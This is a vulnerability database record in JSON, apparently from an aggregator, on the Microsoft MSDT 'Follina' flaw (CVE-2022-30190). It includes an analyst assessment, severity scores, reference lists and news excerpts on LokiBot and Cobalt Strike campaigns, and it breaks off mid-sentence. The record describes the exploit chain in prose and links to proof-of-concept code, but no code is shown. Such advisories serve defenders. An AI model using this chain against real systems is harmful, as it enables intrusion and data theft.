DATABASE RESOURCES PRICING ABOUT US

{"id": "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "vendorId": null, "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2022-30190", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at May 31, 2022 12:56pm UTC reported:\n\nEDIT: This was a quick description, and while it is still accurate as far as I know, A Rapid7 Evaluation with greater analysis has been published here: <https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>\n\nThis is a relatively new vulnerability in the Microsoft Support Diagnostic Tool Vulnerability, so it is likely more information will come out in the coming days. \nCurrently, as seen in the wild, this vulnerability is embedded in a word document and likely distributed with a *.rar file. When the Word document is opened, it reaches out and downloads an HTML file which has a JS section to implement the ms-msdt (Microsoft Support Diagnostic Tool Vulnerability) protocol which is then coerced into launching a command. \nAs reported by Jake Williams in a thread here: <https://twitter.com/MalwareJake/status/1531019243411623939>, the command opens the accomplanying `*.rar` file and pulls a base64 encoded `*.cab` file from it, then expands the *cab file and runs a file contained in the cab file called `rgb.exe` THIS FILENAME IS LIKELY MUTABLE, SO I DO NOT RECCOMMEND POLICING FOR IT WITHOUT OTHER RULES. \nMicrosoft has already published mitigation techniques for this exploit: <https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/> \nUsers are required to delete a single registry key called `HKEY_CLASSES_ROOT\\ms-msdt` though there is little discussion about the side effects of this operation. In his thread, Jake Williams has verified that the removal of this key prevents execution of the embedded payload. \nFurther reading: \n<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e> \nUntested and unverified PoC: <https://github.com/chvancooten/follina.py/blob/main/follina.py> \n<https://www.scythe.io/library/breaking-follina-msdt-vulnerability>\n\nUPDATE: I adjusted the attacker value up in light of reports by Kevin Beaumont that if the attacker uses an RTF file as the host, then the exploit code will run just viewing the file in the preview pane with explorer.exe. (details here: <https://github.com/JMousqueton/PoC-CVE-2022-30190> and the above doublepulsar blog post)\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "published": "2022-06-02T00:00:00", "modified": "2022-06-02T00:00:00", "epss": [{"cve": "CVE-2021-40444", "epss": 0.97028, "percentile": 0.9959, "modified": "2023-05-23"}, {"cve": "CVE-2022-30190", "epss": 0.97252, "percentile": 0.99752, "modified": "2023-08-11"}], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190", "https://blog.underc0de.org/xworm-malware-explota-la-vulnerabilidad-de-follina-en-una-nueva-ola-de-ataques/", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190", "http://packetstormsecurity.com/files/167438/Microsoft-Office-Word-MSDTJS-Code-Execution.html"], "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "immutableFields": [], "lastseen": "2023-08-12T02:18:12", "viewCount": 980, "enchantments": {"score": {"value": 7.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0"]}, {"type": "avleonov", "idList": ["AVLEONOV:37BE727F2D0C216B8B10BD6CBE6BD061", "AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "AVLEONOV:4B6EFA5DE55BAEFCD9C72826A3524969", "AVLEONOV:5945665DFA613F7707360C10CED8C916"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0554", "CPAI-2022-0283"]}, {"type": "cisa", "idList": ["CISA:C70D91615E3DC8B589B493118D474566", "CISA:F30D0D7B72453DC3FC64D2AC1AA31F33"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-40444", "CISA-KEV-CVE-2022-30190"]}, {"type": "cnvd", "idList": ["CNVD-2021-69088"]}, {"type": "cve", "idList": ["CVE-2021-40444", "CVE-2022-30190"]}, {"type": "githubexploit", "idList": ["005DDBE6-0F17-58D7-9DC2-4D1F01F2A8FD", "02FCE52D-5E91-5C57-A40A-DE4FF7C726A3", "0990FE6E-7DC3-559E-9B84-E739872B988C", "0AD00567-1561-5CE2-8DA5-E64B286CBCAC", "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "0E388E09-F00E-58B6-BEFE-026913357CE0", "0E951B86-8BC4-54D9-BE2B-7B5DD988D1A0", "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "111C9F44-593D-5E56-8040-615B48ED3E24", "1840A140-1CD9-55F2-A8BD-9B7B27779956", "1934A15D-9857-5560-B6CA-EA6A2A8A91F8", "1CC55581-1C7F-5DA8-A34C-FA125B3D510A", "1E1DD2F1-F609-5686-A0EF-1C08ACABF537", "221070D3-0B31-5CF7-A508-B4740B63647B", "24DE1902-4427-5442-BF63-7657293966E2", "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "2D9FF49E-AD93-5397-80B0-B02DED73DEA6", "30F42F9A-5E27-592E-BE65-B85DC7E22075", "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "37F78533-E96A-5433-B558-90DB82C0BB27", "39D1AD81-7117-5EA3-8421-A33979B77F49", "3CCF78E3-E22A-54A3-907C-1D687E20BE7C", "45B4D881-57D9-51C8-B5B9-9A6DA7413A36", "4881AA63-B127-594A-8F5B-ED68FD4BB9FF", "56417A88-33CB-520F-8FC3-4F3E49561DDC", "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "5B74BEF9-0D39-5A60-8806-ABA55730878C", "5DC52EE8-31C1-5E05-8AC1-8385C2002254", "5E983FEF-4BE8-5A69-BABE-3CFFC983F1B5", "633FDFCF-0DF4-5FE6-B5DF-85F847D6D31E", "66A7ADCB-1EAD-519B-9B1F-5694A2860BA1", "675E960A-9F2E-5575-8C21-8528492BE5C6", "6AF23F99-AE40-5899-AD81-AE3F71760F38", "6BC80C90-569E-5084-8C0E-891F12F1805E", "6E70CDA8-57F7-5737-80B5-84D8D2254D9D", "70407390-C149-54F1-89B0-7611FB420601", "705BFDF7-98C8-5300-AB18-E9EEE465AE5F", "71065DAD-91FD-5CFB-9F35-CA3E1837FF2C", "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "7333A285-768C-5AD9-B64E-0EC75F075597", "74AB19DC-78DE-56B8-8EB3-DBFA48B17AD5", "75389328-1B05-5056-B8C0-C624BF0343AD", "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "7FAB36AD-345E-5C1B-B259-20BF0E7DE97A", "81008F39-5622-5A06-95F5-737A63D240D0", "8516D742-8A1C-521C-8372-26BA9FBA2200", "85BF1C0C-52A1-5413-8D04-253B6AC0B7CA", "88EFCA30-5DED-59FB-A476-A92F53D1497E", "8AB79327-A57A-5D2D-830F-F7DAA97B76AA", "8B907536-B213-590D-81B9-32CF4A55322E", "8CD90173-6341-5FAD-942A-A9617561026A", "8FDF5020-8C7F-5695-ADD0-58100BD21FFF", "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "9CB70E27-04CC-50BC-9F3E-2907ABA654EA", "A4440EF1-5891-5FCD-BA92-DD2B6E54C7F0", "A78746B7-318B-5981-A2EB-2D5BA5C26514", "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "B2474BAA-4133-5059-8F0B-5BAAE9664466", "B3146F3C-4919-564B-8B1E-752FCA30B8D9", "B49D93D1-E77A-5CAA-8DAC-BC353782D5A7", "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "B9C2639D-9C07-5F11-B663-C144F457A9F7", "BAA0F684-952E-5B9E-B207-0419A33AC53B", "BC3F41CB-4333-5CCE-85A9-7064DAA6019A", "CA13A26D-7A19-511A-B059-BE9AEDA1F2E2", "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "CEC4033D-26C5-5A07-8D86-31A7AF928BDB", "D70A4D0B-027B-57A1-B882-C70D16FCA9C3", "DD36D028-7FB1-5824-9756-09BA3927DCEE", "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "E06577DB-A581-55E1-968E-81430C294A84", "E34732DA-6DCA-54FF-8A7A-C1CCE3D1B1DE", "E51E8D61-BAA6-5098-9EEE-50DD18427F87", "E6B6EDFD-3B78-58CA-B507-093047F89BB1", "E7177DCC-97D5-5A91-8A06-124DD3CB9739", "E917FE93-F06C-5F70-915F-A5F48A30B044", "F437A0D1-7913-51F2-9D43-8BC2DE62A636", "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "F8ECE1BA-CC33-5566-B57C-1AB243A48E28", "F96D1468-D4E5-54F8-A03B-503ABF9BC416", "FAF36735-05C9-50E1-B458-BA2E15B5EB99", "FB757D3A-A896-5AB5-B72B-7C880581D12E", "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "FC455648-370A-582B-A03A-6299DDC272F6", "FCCAAA4B-646B-578D-8CE2-5439E7799C32", "FD6B81DE-3BFF-5BC7-BD1F-E90103B8FBEF", "FF761088-559C-5E71-A5CD-196D4E4571B8", "FFA2D3A3-AFD4-580B-8424-EE4844976B65"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1606957"]}, {"type": "hivepro", "idList": ["HIVEPRO:04FABAE2F2B647B3488AA0025301D637", "HIVEPRO:6551149EE518F9D073E43B5017FE0F24", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:B84508E062BD1F35232DF0CC7CDDC761", "HIVEPRO:C7B595FEDAF36C429CA05AF1C5C3D818", "HIVEPRO:CA37C8D639BE8660B8996BB5FB4F3C0F", "HIVEPRO:E57DA2FED4B890B898EFA2B68C657043"]}, {"type": "ics", "idList": ["AA22-117A", "AA22-216A", "AA23-215A"]}, {"type": "kaspersky", "idList": ["KLA12277", "KLA12278", "KLA12549", "KLA12550"]}, {"type": "kitploit", "idList": ["KITPLOIT:3697667464193804316"]}, {"type": "krebs", "idList": ["KREBS:2752861A306F74170D69FBD9E0DC3AAB", "KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0647495F01C9F1847B118A9E32BC6C13", "MALWAREBYTES:69B09CC9DBBA58546698D97B0C4BAAF0", "MALWAREBYTES:6AC81D4001C847401760BE111E21585B", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "MALWAREBYTES:96F58422910DF7040786EDB21736E547", "MALWAREBYTES:9E683A8CBB0F4ADB76A7183C47833E13", "MALWAREBYTES:A92CA3CF06DBCD086A388A462B770E3B", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSDTJS_RCE-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "mscve", "idList": ["MS:CVE-2021-40444", "MS:CVE-2022-30190", "MS:CVE-2022-34713"]}, {"type": "mskb", "idList": ["KB5005563"]}, {"type": "msrc", "idList": ["MSRC:023FEF60BCC2EE0035211FC95DB999BC", "MSRC:0FAFC00A7C2E92F14C0652D2CD1D14D7", "MSRC:4C56F4539ADD1B17DFD44549ADFEE2FF", "MSRC:AA9DD4993698C2F7A48FCF9F2BB413F3"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "nessus", "idList": ["MSDT_RCE_CVE_2022-30190_REG_CHECK.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SMB_NT_MS22_JUN_5014678.NASL", "SMB_NT_MS22_JUN_5014692.NASL", "SMB_NT_MS22_JUN_5014697.NASL", "SMB_NT_MS22_JUN_5014699.NASL", "SMB_NT_MS22_JUN_5014702.NASL", "SMB_NT_MS22_JUN_5014710.NASL", "SMB_NT_MS22_JUN_5014741.NASL", "SMB_NT_MS22_JUN_5014742.NASL", "SMB_NT_MS22_JUN_5014743.NASL", "SMB_NT_MS22_JUN_5014746.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165214", "PACKETSTORM:167317", "PACKETSTORM:167438"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:573ABD5196CDA14A2E72A15A7330770D", "QUALYSBLOG:5CC7ADA9A785C30C51281080605F4A4F", "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "QUALYSBLOG:9E3CACCA2916D132C2D630A8C15119F3", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:A63B251EBA1A69DBCD57674990704F6C", "QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "QUALYSBLOG:BB3D6B2DDD8D4FA41B52503EF011FDA4", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:36C78C12B88BFE8FEF93D8EF7A7AA553", "RAPID7BLOG:509F3BE1FB927288AB4D3BD9A3090852", "RAPID7BLOG:693317EA8EAC89A3ABCC113D072B326C", "RAPID7BLOG:882168BD332366CE296FB09DC00E018E", "RAPID7BLOG:ADAE3CACA7F41A02C12F44F4616369FF", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046"]}, {"type": "schneier", "idList": ["SCHNEIER:FECDA04283F9CFE2D14C1550420A1804"]}, {"type": "securelist", "idList": ["SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:D9AF9603FDB076FD6351B6ED483A4947"]}, {"type": "talosblog", "idList": ["TALOSBLOG:446DF38AD4792F3CF775EEF8182E9A9B", "TALOSBLOG:DE5281D9A4A03E4FA1F2A0B62B527489"]}, {"type": "thn", "idList": ["THN:1B5512B7CB75F82A34395AC39A9B2680", "THN:1B983787EB2BA5D0757F1F83458B7ABE", "THN:1EFEC00D867275514EA180819C9EF104", "THN:21FC29F7D7C7E2DA7D2F19E89085FD55", "THN:273B5BCEB3A6EC52EA8B8BB5D09A21BF", "THN:35E0781FC3AEDCA2324C9B95396A5FF7", "THN:44DD118DC206D25EB4ECAE95173FE16E", "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:6C7E32993558CB9F19CAE15C18522582", "THN:75A32CF309184E2A99DA7B43EFBFA8E7", "THN:7A6D54BC76D090840197DDF871D59731", "THN:856F9A41F44F9B2C95A68501B0D1B5A7", "THN:8A60310AB796B7372A105B7C8811306B", "THN:8C7C0BBCE90D4B2076F46E011BAB609D", "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "THN:96E4C6D641E3E5B73D4B9A87628DD3CF", "THN:A24E3ECC17FDA35932981ED1D0B9B351", "THN:B399D1943153CEEF405B85D4310C2142", "THN:B8CBCDA7152660D9AE3D4E058B7B9B0F", "THN:BD014635C5F702379060A20290985162", "THN:C17A0F3DD156CF2240FAEABA6716D0E9", "THN:C4188C7A44467E425407D33067C14094", "THN:CD69EF060C75E2FF4DB33C7C492E75B1", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:D9A5562FBD56B3B0FF85376C9BCF0A10", "THN:DFB68B1B6C2EFBB410EB54D83320B71C", "THN:E7762183A6F7B3DDB942D3F1F99748F6", "THN:FB2F303221B7A65E2CFAC245F0DD0B47"]}, {"type": "threatpost", "idList": ["THREATPOST:24243FD4F7B9BDBDAC283E15D460128F", "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:4365205CB12A4437E20A1077682B9CF8", "THREATPOST:44942C746E9FFDC2F783FA19F0AFD348", "THREATPOST:4C8D995307A845304CF691725B2352A2", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:B2FEDF3EA50507F526C77105093E8977"]}, {"type": "trellix", "idList": ["TRELLIX:0BACBA94111E0C364A9A1CCD8BD263DE", "TRELLIX:1B98406D173663FA7B8E48F103AAE482", "TRELLIX:341471F990B5DC7BFF1C28F924F10E32", "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "zdt", "idList": ["1337DAY-ID-37126", "1337DAY-ID-37779"]}]}, "epss": [{"cve": "CVE-2021-40444", "epss": 0.96903, "percentile": 0.99515, "modified": "2023-05-02"}, {"cve": "CVE-2022-30190", "epss": 0.9744, "percentile": 0.99895, "modified": "2023-05-02"}], "vulnersScore": 7.1}, "_state": {"score": 1691806998, "dependencies": 1691806792, "epss": 0}, "_internal": {"score_hash": "edd0df6958a377d56d06682fee716ac6"}, "attackerkb": {"attackerValue": 4, "exploitability": 4}, "wildExploited": true, "wildExploitedCategory": {"News Article or Blog": "", "Vendor Advisory": "", "Threat Feed": ""}, "wildExploitedReports": [{"category": "News Article or Blog", "source_url": "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "published": "2022-05-31T13:01:00"}, {"category": "Vendor Advisory", "source_url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", "published": "2022-06-01T15:22:00"}, {"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "published": "2022-06-01T15:22:00"}, {"category": "Threat Feed", "source_url": "https://inthewild.io/vuln/CVE-2022-30190", "published": "2022-06-03T18:05:00"}, {"category": "News Article or Blog", "source_url": "https://securityaffairs.co/wordpress/131843/apt/china-apt-exploits-follina-flaw.html", "published": "2022-06-03T18:05:00"}, {"category": "Other:", "source_url": "https://cybersecurityworks.com/howdymanage/uploads/file/Ransomware%20Report%202023_compressed.pdf", "published": "2022-06-03T18:05:00"}, {"category": "Threat Feed", "source_url": "https://blog.underc0de.org/xworm-malware-explota-la-vulnerabilidad-de-follina-en-una-nueva-ola-de-ataques/", "published": "2023-05-25T14:40:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190"], "Exploit": ["https://blog.underc0de.org/xworm-malware-explota-la-vulnerabilidad-de-follina-en-una-nueva-ola-de-ataques/"], "Miscellaneous": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190", "http://packetstormsecurity.com/files/167438/Microsoft-Office-Word-MSDTJS-Code-Execution.html"]}, "tags": ["common_enterprise", "easy_to_develop", "pre_auth", "default_configuration", "requires_interaction"], "mitre_vector": {"Execution": ["Exploitation for Client Execution(Validated)", "User Execution: Malicious File(Validated)"]}, "last_activity": "2023-05-25T14:40:00"}

{"thn": [{"lastseen": "2023-07-17T10:25:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjJOMAEPqVWWitHSvFnZCKLyOSaDJql5EnF-l96RW57mmexBC_GQqnd__4R64YlOri0OO7PI1E6Pz9ezQs2U8kPJJA_6b2rXJnClq7hdpQjRTSwBjMOACqATXTcr67r69MFPbkkIxmbAcrcHcOa4bK7EWNBIVqGb74_0P1I1nXV7ZrpYVHtpOPYFnbxDxU9/s728-e365/macro.jpg>)\n\nMicrosoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called **LokiBot** on compromised systems.\n\n\"LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015,\" Fortinet FortiGuard Labs researcher Cara Lin [said](<https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros>). \"It primarily targets Windows systems and aims to gather sensitive information from infected machines.\"\n\nThe cybersecurity company, which spotted the campaign in May 2023, said the attacks take advantage of [CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) and [CVE-2022-30190](<https://thehackernews.com/2023/07/romcom-rat-targeting-nato-and-ukraine.html>) (aka Follina) to achieve code execution.\n\nThe Word file that weaponizes CVE-2021-40444 contains an external GoFile link embedded within an XML file that leads to the download of an HTML file, which exploits Follina to download a next-stage payload, an injector module written in Visual Basic that decrypts and launches LokiBot.\n\nThe injector also features evasion techniques to check for the presence of debuggers and determine if it's running in a virtualized environment.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhY0lBlalarJC15jGyY-iAo2cMsq9PmNO4l9CUjSvoLs_pFjhqaurstC3hpmGK9Z_LVY_Jzn5eET2tVtVC6fXjHE3_x17nB7UHLASP0A2WJSOfZKzS1XZgB0b5823Y1rklx3CtJLIzZLZZAWo8Py2PPQZEYFUQR-ZmWWl9JmGCLVLfE-PUdMq-d3r2MlL57/s728-e365/doc.jpg>)\n\nAn alternative chain discovered towards the end of May starts with a Word document incorporating a VBA script that executes a macro immediately upon opening the document using the \"Auto_Open\" and \"Document_Open\" functions.\n\nThe macro script subsequently acts as a conduit to deliver an interim payload from a remote server, which also functions as an injector to load LokiBot and connect to a command-and-control (C2) server.\n\nUPCOMING WEBINAR\n\n[Shield Against Insider Threats: Master SaaS Security Posture Management\n\n](<https://thn.news/I26t1VFD>)\n\nWorried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.\n\n[Join Today](<https://thn.news/I26t1VFD>)\n\n[LokiBot](<https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws>), not to be confused with an [Android banking trojan](<https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot>) of the same name, comes with capabilities to log keystrokes, capture screenshots, gather login credential information from web browsers, and siphon data from a variety of cryptocurrency wallets.\n\n\"LokiBot is a long-standing and widespread malware active for many years,\" Lin said. \"Its functionalities have matured over time, making it easy for cybercriminals to use it to steal sensitive data from victims. The attackers behind LokiBot continually update their initial access methods, allowing their malware campaign to find more efficient ways to spread and infect systems.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-17T09:04:00", "type": "thn", "title": "Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2023-07-17T09:04:48", "id": "THN:1B5512B7CB75F82A34395AC39A9B2680", "href": "https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-3vEprTVA4BI/YULvTEzYNCI/AAAAAAAADz0/RpSk1fU9GbcY7e98Gg2r8aBRvy73Z52kACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nMicrosoft on Wednesday disclosed details of a targeted phishing campaign that leveraged a now-patched zero-day flaw in its MSHTML platform using specially-crafted Office documents to deploy Cobalt Strike Beacon on compromised Windows systems.\n\n\"These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders,\" Microsoft Threat Intelligence Center [said](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in a technical write-up. \"These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\"\n\nDetails about CVE-2021-40444 (CVSS score: 8.8) first [emerged](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) on September 7 after researchers from EXPMON alerted the Windows maker about a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users by taking advantage of a remote code execution vulnerability in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document,\" the researchers noted. Microsoft has since [rolled out a fix](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) for the vulnerability as part of its Patch Tuesday updates a week later on September 14.\n\nThe Redmond-based tech giant attributed the activities to related cybercriminal clusters it tracks as DEV-0413 and DEV-0365, the latter of which is the company's moniker for the emerging threat group associated with creating and managing the Cobalt Strike infrastructure used in the attacks. The earliest exploitation attempt by DEV-0413 dates back to August 18.\n\nThe exploit delivery mechanism originates from emails impersonating contracts and legal agreements hosted on file-sharing sites. Opening the malware-laced document leads to the download of a Cabinet archive file containing a DLL bearing an INF file extension that, when decompressed, leads to the execution of a function within that DLL. The DLL, in turn, retrieves remotely hosted shellcode \u2014 a custom Cobalt Strike Beacon loader \u2014 and loads it into the Microsoft address import tool.\n\nAdditionally, Microsoft said some of the infrastructures that were used by DEV-0413 to host the malicious artifacts were also involved in the delivery of BazaLoader and Trickbot payloads, a separate set of activities the company monitors under the codename DEV-0193 (and by Mandiant as UNC1878).\n\n\"At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack,\" the researchers said. \"It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\"\n\nIn an independent investigation, Microsoft's RiskIQ subsidiary attributed the attacks with high confidence to a ransomware syndicate 